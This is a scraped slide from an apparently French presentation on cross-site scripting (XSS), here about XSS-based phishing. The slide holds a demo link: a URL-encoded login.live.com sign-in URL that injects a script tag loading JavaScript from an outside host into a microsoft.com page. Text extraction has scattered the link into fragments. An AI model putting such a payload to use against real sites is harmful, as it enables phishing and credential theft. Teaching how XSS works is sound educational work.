X hits on this document

114 views

0 shares

0 downloads

0 comments

8 / 46

XSS – de la brise à l'ouragan – I) Brise et revue d'armes – Le XSS, comment ça marche ? B) XSS et API DOM

Application la plus classique : l'attaque de phishing

Démo :

volatile :

login.live.com/l wa=wsignin1.0&rp %2Fwww.microsoft %3DIDACYTL%26bac %2522%2527%2520% %252fphares.ac-r %253C%252fscript %3Df4502d34-3b8f %2B06%26returnur %252fwindowsmobi %253dhttp%25253a %252522%252527%2 %25253dhttps%252 %25252fadmin%252 %25252fpocketpc%

ogin.srf? snv=10&ct=12 .com%2Ffranc kUrl%3Dhttp% 253E%253C%25 ennes.fr%252 %253Edowsmob

  • -

    4a04-b741-2

l%3Dhttp%253 le%252fpocke %25252f%2525 52520%25253E 53a%25252f%2 52fA%25252fi 25252fdefaul

39868301&rver=5.0.3265.0&wp=MCLBI&wrep e%2Fwindowsmobile%2Fpocketpc%2Fdetails 253a%252f%252fwww.microsoft.com%252ffr 2Fa%253E%253Cscript%2Bsrc%253dhttps%25 f_fichiers_%252fssi%252fadmin%252fA%25 ile%252fpocketpc%252fdefault.mspx&lc=1 89e08aa1782%26brand%3DWindows%2BMobile a%252f%252fwww.microsoft.com%252ffranc tpc%252fdetails.mspx%253fid%253dIDACYT 2fwww.microsoft.com%25252ffrance%25252 %25253C%25252Fa%25253E%25253Cscript%25 5252fphares.ac-rennes.fr%25252f_fichie .js%252b%25253E%25253C%25252fscript%25 t.mspx%26wp%3DMCLBI%26lcid%3D1036&id=7

ly=https:%2F .mspx%3Fid ance%252fwin 3a%252f 2fi.js%2B%253E 036&cb=wizid

e L%2526backUrl fwin 2bsrc rs_%25252fssi 253Edowsmobile 4335

Persistante...

Document info
Document views114
Page views123
Page last viewedThu Dec 08 09:55:46 UTC 2016
Pages46
Paragraphs417
Words3787

Comments